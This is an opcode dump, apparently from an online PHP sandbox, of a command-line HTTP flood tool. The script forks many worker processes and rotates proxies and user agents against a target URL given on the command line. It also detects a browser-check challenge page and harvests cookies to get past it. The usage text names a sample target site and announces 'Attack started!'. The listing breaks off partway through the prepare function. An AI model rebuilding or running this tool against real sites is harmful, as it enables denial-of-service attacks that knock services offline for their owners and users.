Finding entry points Branch analysis from position: 0 2 jumps found. (Code = 43) Position 1 = 28, Position 2 = 43 Branch analysis from position: 28 2 jumps found. (Code = 47) Position 1 = 53, Position 2 = 56 Branch analysis from position: 53 2 jumps found. (Code = 47) Position 1 = 57, Position 2 = 60 Branch analysis from position: 57 2 jumps found. (Code = 47) Position 1 = 61, Position 2 = 64 Branch analysis from position: 61 2 jumps found. (Code = 43) Position 1 = 65, Position 2 = 86 Branch analysis from position: 65 1 jumps found. (Code = 79) Position 1 = -2 Branch analysis from position: 86 1 jumps found. (Code = 42) Position 1 = 125 Branch analysis from position: 125 2 jumps found. (Code = 44) Position 1 = 127, Position 2 = 95 Branch analysis from position: 127 1 jumps found. (Code = 42) Position 1 = 132 Branch analysis from position: 132 2 jumps found. (Code = 44) Position 1 = 138, Position 2 = 128 Branch analysis from position: 138 1 jumps found. (Code = 62) Position 1 = -2 Branch analysis from position: 128 2 jumps found. (Code = 44) Position 1 = 138, Position 2 = 128 Branch analysis from position: 138 Branch analysis from position: 128 Branch analysis from position: 95 2 jumps found. (Code = 43) Position 1 = 105, Position 2 = 124 Branch analysis from position: 105 2 jumps found. (Code = 43) Position 1 = 115, Position 2 = 123 Branch analysis from position: 115 1 jumps found. (Code = 79) Position 1 = -2 Branch analysis from position: 123 Branch analysis from position: 124 2 jumps found. (Code = 44) Position 1 = 127, Position 2 = 95 Branch analysis from position: 127 Branch analysis from position: 95 Branch analysis from position: 64 Branch analysis from position: 60 Branch analysis from position: 56 Branch analysis from position: 43 filename: /in/qoKdR function name: (null) number of ops: 157 compiled vars: !0 = $colors, !1 = $temp_name, !2 = $uas, !3 = $host, !4 = $argv, !5 = $proxy, !6 = $cookies_c, !7 = $threads_in, !8 = $whandlers, !9 = $timeout, !10 = $proxies, !11 = $i, !12 = $pid, !13 = $ua, !14 = $cookies, !15 = $handler, !16 = $status, !17 = $handlers line #* E I O op fetch ext return operands ------------------------------------------------------------------------------------- 2 0 E > INIT_FCALL 'error_reporting' 1 SEND_VAL 1 2 DO_ICALL 59 3 NEW $19 'Colors' 4 DO_FCALL 0 5 ASSIGN !0, $19 62 6 INIT_FCALL 'time' 7 DO_ICALL $22 8 CONCAT ~23 $22, '_' 9 INIT_FCALL 'rand' 10 SEND_VAL 1000 11 SEND_VAL 9999 12 DO_ICALL $24 13 CONCAT ~25 ~23, $24 14 ASSIGN !1, ~25 64 15 ASSIGN !2, <array> 187 16 FETCH_DIM_R ~28 !4, 1 17 ASSIGN !3, ~28 188 18 FETCH_DIM_R ~30 !4, 5 19 ASSIGN !5, ~30 189 20 ASSIGN !6, 0 190 21 FETCH_DIM_R ~33 !4, 2 22 ASSIGN !7, ~33 191 23 FETCH_DIM_R ~35 !4, 4 24 ASSIGN !8, ~35 193 25 ASSIGN !9, 2 194 26 IS_NOT_EQUAL !5, null 27 > JMPZ ~38, ->43 195 28 > INIT_FCALL 'explode' 29 SEND_VAL '%0A' 30 INIT_FCALL 'file_get_contents' 31 SEND_VAR !5 32 DO_ICALL $39 33 SEND_VAR $39 34 DO_ICALL $40 35 ASSIGN !10, $40 196 36 INIT_FCALL 'max' 37 INIT_FCALL 'array_keys' 38 SEND_VAR !10 39 DO_ICALL $42 40 SEND_VAR $42 41 DO_ICALL $43 42 ASSIGN !8, $43 198 43 > INIT_METHOD_CALL !0, 'getColoredString' 44 SEND_VAL_EX 'Made+By+Andrew%0ATelegram%3A+https%3A%2F%2Ft.me%2FVaiiry%0A' 45 SEND_VAL_EX 'light_red' 46 SEND_VAL_EX null 47 DO_FCALL 0 $45 48 CONCAT ~46 $45, '%0A' 49 ECHO ~46 200 50 ISSET_ISEMPTY_DIM_OBJ 0 ~47 !4, 1 51 BOOL_NOT ~48 ~47 52 > JMPNZ_EX ~48 ~48, ->56 53 > ISSET_ISEMPTY_DIM_OBJ 0 ~49 !4, 2 54 BOOL_NOT ~50 ~49 55 BOOL ~48 ~50 56 > > JMPNZ_EX ~48 ~48, ->60 57 > ISSET_ISEMPTY_DIM_OBJ 0 ~51 !4, 3 58 BOOL_NOT ~52 ~51 59 BOOL ~48 ~52 60 > > JMPNZ_EX ~48 ~48, ->64 61 > ISSET_ISEMPTY_DIM_OBJ 0 ~53 !4, 4 62 BOOL_NOT ~54 ~53 63 BOOL ~48 ~54 64 > > JMPZ ~48, ->86 201 65 > INIT_METHOD_CALL !0, 'getColoredString' 66 FETCH_DIM_R ~55 !4, 0 67 CONCAT ~56 'Usage%3A+php+', ~55 68 CONCAT ~57 ~56, '+%5BURL%5D+%5BTHREADS%5D+%5BSECONDS%5D+%5BCLIENTS_NUMBER%5D+%5BPROXY_FILE%5D' 69 SEND_VAL_EX ~57 70 SEND_VAL_EX 'light_green' 71 SEND_VAL_EX null 72 DO_FCALL 0 $58 73 CONCAT ~59 $58, '%0A' 74 ECHO ~59 202 75 INIT_METHOD_CALL !0, 'getColoredString' 76 FETCH_DIM_R ~60 !4, 0 77 CONCAT ~61 'Example%3A+php+', ~60 78 CONCAT ~62 ~61, '+http%3A%2F%2Fblunter.xyz%2F+800+60+20+proxies.txt' 79 SEND_VAL_EX ~62 80 SEND_VAL_EX 'light_green' 81 SEND_VAL_EX null 82 DO_FCALL 0 $63 83 CONCAT ~64 $63, '%0A' 84 ECHO ~64 203 85 > EXIT 205 86 > INIT_METHOD_CALL !0, 'getColoredString' 87 SEND_VAL_EX 'Warning%3A+Using+proxies+the+attack+can+be+slower%21' 88 SEND_VAL_EX 'yellow' 89 SEND_VAL_EX 'black' 90 DO_FCALL 0 $65 91 CONCAT ~66 $65, '%0A' 92 ECHO ~66 364 93 ASSIGN !11, 1 94 > JMP ->125 365 95 > INIT_FCALL_BY_NAME 'pcntl_fork' 96 DO_FCALL 0 $68 97 ASSIGN !12, $68 366 98 INIT_FCALL 'array_rand' 99 SEND_VAR !2 100 DO_ICALL $70 101 FETCH_DIM_R ~71 !2, $70 102 ASSIGN !13, ~71 367 103 BOOL_NOT ~73 !12 104 > JMPZ ~73, ->124 368 105 > INIT_FCALL 'prepare' 106 SEND_VAR !3 107 SEND_VAR !13 108 FETCH_DIM_R ~74 !10, !11 109 SEND_VAL ~74 110 SEND_VAR !11 111 DO_FCALL 0 $75 112 ASSIGN !14, $75 369 113 IS_NOT_EQUAL !14, null 114 > JMPZ ~77, ->123 370 115 > INIT_ARRAY ~78 !14, 'cookies' 116 ADD_ARRAY_ELEMENT ~78 !13, 'ua' 117 FETCH_DIM_R ~79 !10, !11 118 ADD_ARRAY_ELEMENT ~78 ~79, 'proxy' 119 ASSIGN !15, ~78 372 120 INIT_FCALL 'writehandler' 121 SEND_VAR !15 122 DO_FCALL 0 374 123 > > EXIT !11 364 124 > PRE_INC !11 125 > IS_SMALLER_OR_EQUAL !11, !8 126 > JMPNZ ~83, ->95 378 127 > > JMP ->132 379 128 > INIT_FCALL_BY_NAME 'pcntl_wexitstatus' 129 SEND_VAR_EX !16 130 DO_FCALL 0 $84 131 ASSIGN !16, $84 378 132 > INIT_FCALL_BY_NAME 'pcntl_waitpid' 133 SEND_VAL_EX 0 134 SEND_VAR_EX !16 135 DO_FCALL 0 $86 136 IS_NOT_EQUAL $86, -1 137 > JMPNZ ~87, ->128 382 138 > INIT_FCALL 'readhandlers' 139 DO_FCALL 0 $88 140 ASSIGN !17, $88 383 141 INIT_FCALL 'delete' 142 CONCAT ~90 !1, '%2F' 143 SEND_VAL ~90 144 DO_FCALL 0 386 145 INIT_METHOD_CALL !0, 'getColoredString' 146 SEND_VAL_EX 'Attack+started%21' 147 SEND_VAL_EX 'light_green' 148 SEND_VAL_EX null 149 DO_FCALL 0 $92 150 CONCAT ~93 $92, '%0A' 151 ECHO ~93 387 152 INIT_FCALL 'attack' 153 SEND_VAR !3 154 SEND_VAR !7 155 DO_FCALL 0 388 156 > RETURN 1 Function delete: Finding entry points Branch analysis from position: 0 2 jumps found. (Code = 43) Position 1 = 6, Position 2 = 52 Branch analysis from position: 6 2 jumps found. (Code = 77) Position 1 = 15, Position 2 = 46 Branch analysis from position: 15 2 jumps found. (Code = 78) Position 1 = 16, Position 2 = 46 Branch analysis from position: 16 2 jumps found. (Code = 43) Position 1 = 21, Position 2 = 45 Branch analysis from position: 21 2 jumps found. (Code = 43) Position 1 = 25, Position 2 = 31 Branch analysis from position: 25 1 jumps found. (Code = 42) Position 1 = 45 Branch analysis from position: 45 1 jumps found. (Code = 42) Position 1 = 15 Branch analysis from position: 15 Branch analysis from position: 31 2 jumps found. (Code = 47) Position 1 = 35, Position 2 = 39 Branch analysis from position: 35 2 jumps found. (Code = 43) Position 1 = 40, Position 2 = 45 Branch analysis from position: 40 1 jumps found. (Code = 42) Position 1 = 15 Branch analysis from position: 15 Branch analysis from position: 45 Branch analysis from position: 39 Branch analysis from position: 45 Branch analysis from position: 46 1 jumps found. (Code = 62) Position 1 = -2 Branch analysis from position: 46 Branch analysis from position: 52 2 jumps found. (Code = 47) Position 1 = 57, Position 2 = 62 Branch analysis from position: 57 2 jumps found. (Code = 43) Position 1 = 63, Position 2 = 67 Branch analysis from position: 63 1 jumps found. (Code = 62) Position 1 = -2 Branch analysis from position: 67 1 jumps found. (Code = 62) Position 1 = -2 Branch analysis from position: 62 filename: /in/qoKdR function name: Delete number of ops: 69 compiled vars: !0 = $path, !1 = $files, !2 = $file line #* E I O op fetch ext return operands ------------------------------------------------------------------------------------- 207 0 E > RECV !0 209 1 INIT_FCALL 'is_dir' 2 SEND_VAR !0 3 DO_ICALL $3 4 TYPE_CHECK 8 $3 5 > JMPZ ~4, ->52 211 6 > NEW $5 'RecursiveIteratorIterator' 7 NEW $6 'RecursiveDirectoryIterator' 8 SEND_VAR_EX !0 9 DO_FCALL 0 10 SEND_VAR_NO_REF_EX $6 11 SEND_VAL_EX 2 12 DO_FCALL 0 13 ASSIGN !1, $5 213 14 > FE_RESET_R $10 !1, ->46 15 > > FE_FETCH_R $10, !2, ->46 215 16 > INIT_METHOD_CALL !2, 'getBasename' 17 DO_FCALL 0 $11 18 IN_ARRAY ~12 $11, <array> 19 TYPE_CHECK 1014 ~12 20 > JMPZ ~13, ->45 217 21 > INIT_METHOD_CALL !2, 'isDir' 22 DO_FCALL 0 $14 23 TYPE_CHECK 8 $14 24 > JMPZ ~15, ->31 219 25 > INIT_FCALL 'rmdir' 26 INIT_METHOD_CALL !2, 'getPathName' 27 DO_FCALL 0 $16 28 SEND_VAR $16 29 DO_ICALL 30 > JMP ->45 222 31 > INIT_METHOD_CALL !2, 'isFile' 32 DO_FCALL 0 $18 33 TYPE_CHECK 8 ~19 $18 34 > JMPNZ_EX ~19 ~19, ->39 35 > INIT_METHOD_CALL !2, 'isLink' 36 DO_FCALL 0 $20 37 TYPE_CHECK 8 ~21 $20 38 BOOL ~19 ~21 39 > > JMPZ ~19, ->45 224 40 > INIT_FCALL 'unlink' 41 INIT_METHOD_CALL !2, 'getPathname' 42 DO_FCALL 0 $22 43 SEND_VAR $22 44 DO_ICALL 213 45 > > JMP ->15 46 > FE_FREE $10 229 47 INIT_FCALL 'rmdir' 48 SEND_VAR !0 49 DO_ICALL $24 50 > RETURN $24 51* JMP ->67 232 52 > INIT_FCALL 'is_file' 53 SEND_VAR !0 54 DO_ICALL $25 55 TYPE_CHECK 8 ~26 $25 56 > JMPNZ_EX ~26 ~26, ->62 57 > INIT_FCALL 'is_link' 58 SEND_VAR !0 59 DO_ICALL $27 60 TYPE_CHECK 8 ~28 $27 61 BOOL ~26 ~28 62 > > JMPZ ~26, ->67 234 63 > INIT_FCALL 'unlink' 64 SEND_VAR !0 65 DO_ICALL $29 66 > RETURN $29 237 67 > > RETURN <false> 238 68* > RETURN null End of function delete Function prepare: Finding entry points Branch analysis from position: 0 2 jumps found. (Code = 43) Position 1 = 10, Position 2 = 13 Branch analysis from position: 10 2 jumps found. (Code = 43) Position 1 = 12, Position 2 = 13 Branch analysis from position: 12 1 jumps found. (Code = 62) Position 1 = -2 Branch analysis from position: 13 2 jumps found. (Code = 46) Position 1 = 62, Position 2 = 64 Branch analysis from position: 62 2 jumps found. (Code = 43) Position 1 = 65, Position 2 = 90 Branch analysis from position: 65 2 jumps found. (Code = 43) Position 1 = 67, Position 2 = 70 Branch analysis from position: 67 1 jumps found. (Code = 62) Position 1 = -2 Branch analysis from position: 70 Branch analysis from position: 90 2 jumps found. (Code = 43) Position 1 = 98, Position 2 = 151 Branch analysis from position: 98 2 jumps found. (Code = 43) Position 1 = 100, Position 2 = 103 Branch analysis from position: 100 2 jumps found. (Code = 77) Position 1 = 139, Position 2 = 150 Branch analysis from position: 139 2 jumps found. (Code = 78) Position 1 = 140, Position 2 = 150 Branch analysis from position: 140 1 jumps found. (Code = 42) Position 1 = 139 Branch analysis from position: 139 Branch analysis from position: 150 1 jumps found. (Code = 62) Position 1 = -2 Branch analysis from position: 150 Branch analysis from position: 103 Branch analysis from position: 151 Branch analysis from position: 64 Branch analysis from position: 13 filename: /in/qoKdR function name: prepare number of ops: 156 compiled vars: !0 = $url, !1 = $ua, !2 = $proxy, !3 = $pid, !4 = $timeout, !5 = $colors, !6 = $argv, !7 = $ch, !8 = $result, !9 = $proxy_text, !10 = $matches, !11 = $cookiess, !12 = $cf, !13 = $cookies, !14 = $item, !15 = $cookie line #* E I O op fetch ext return operands ------------------------------------------------------------------------------------- 240 0 E > RECV !0 1 RECV !1 2 RECV !2 3 RECV !3 241 4 BIND_GLOBAL !4, 'timeout' 242 5 BIND_GLOBAL !5, 'colors' 243 6 BIND_GLOBAL !6, 'argv' 244 7 FETCH_DIM_R ~16 !6, 5 8 IS_NOT_EQUAL ~16, null 9 > JMPZ ~17, ->13 245 10 > IS_EQUAL !2, '' 11 > JMPZ ~18, ->13 246 12 > > RETURN null 249 13 > INIT_FCALL_BY_NAME 'curl_init' 14 DO_FCALL 0 $19 15 ASSIGN !7, $19 250 16 INIT_FCALL_BY_NAME 'curl_setopt' 17 SEND_VAR_EX !7 18 FETCH_CONSTANT ~21 'CURLOPT_URL' 19 SEND_VAL_EX ~21 20 SEND_VAR_EX !0 21 DO_FCALL 0 251 22 INIT_FCALL_BY_NAME 'curl_setopt' 23 SEND_VAR_EX !7 24 FETCH_CONSTANT ~23 'CURLOPT_USERAGENT' 25 SEND_VAL_EX ~23 26 SEND_VAR_EX !1 27 DO_FCALL 0 252 28 INIT_FCALL_BY_NAME 'curl_setopt' 29 SEND_VAR_EX !7 30 FETCH_CONSTANT ~25 'CURLOPT_RETURNTRANSFER' 31 SEND_VAL_EX ~25 32 SEND_VAL_EX <true> 33 DO_FCALL 0 253 34 INIT_FCALL_BY_NAME 'curl_setopt' 35 SEND_VAR_EX !7 36 FETCH_CONSTANT ~27 'CURLOPT_HEADER' 37 SEND_VAL_EX ~27 38 SEND_VAL_EX 1 39 DO_FCALL 0 254 40 INIT_FCALL_BY_NAME 'curl_setopt' 41 SEND_VAR_EX !7 42 FETCH_CONSTANT ~29 'CURLOPT_TIMEOUT' 43 SEND_VAL_EX ~29 44 SEND_VAR_EX !4 45 DO_FCALL 0 255 46 INIT_FCALL_BY_NAME 'curl_setopt' 47 SEND_VAR_EX !7 48 FETCH_CONSTANT ~31 'CURLOPT_PROXY' 49 SEND_VAL_EX ~31 50 SEND_VAR_EX !2 51 DO_FCALL 0 256 52 INIT_FCALL_BY_NAME 'curl_exec' 53 SEND_VAR_EX !7 54 DO_FCALL 0 $33 55 ASSIGN !8, $33 257 56 INIT_FCALL 'strpos' 57 SEND_VAR !8 58 SEND_VAL 'Checking+your+browser+before+accessing' 59 DO_ICALL $35 60 TYPE_CHECK 4 ~36 $35 61 > JMPZ_EX ~36 ~36, ->64 62 > TYPE_CHECK 1018 ~37 !8 63 BOOL ~36 ~37 64 > > JMPZ ~36, ->90 258 65 > IS_NOT_EQUAL !2, null 66 > JMPZ ~38, ->70 259 67 > NOP 68 FAST_CONCAT ~39 '+%7C+PROXY%3A+', !2 69 ASSIGN !9, ~39 261 70 > INIT_FCALL 'var_dump' 71 SEND_VAR !8 72 DO_ICALL 262 73 INIT_METHOD_CALL !5, 'getColoredString' 74 CONCAT ~42 'Initializing+Cookies+%23', !3 75 CONCAT ~43 ~42, !9 76 CONCAT ~44 ~43, '%0A' 77 SEND_VAL_EX ~44 78 SEND_VAL_EX 'light_red' 79 SEND_VAL_EX null 80 DO_FCALL 0 $45 81 CONCAT ~46 $45, '%0A' 82 ECHO ~46 263 83 INIT_FCALL 'preg_match_all' 84 SEND_VAL '%2F%5ESet-Cookie%3A%5Cs%2A%28%5B%5E%3B%5D%2A%29%2Fmi' 85 SEND_VAR !8 86 SEND_REF !10 87 DO_ICALL 264 88 ASSIGN !11, <array> 265 89 > RETURN !11 268 90 > NEW
Generated using Vulcan Logic Dumper, using php 8.0.0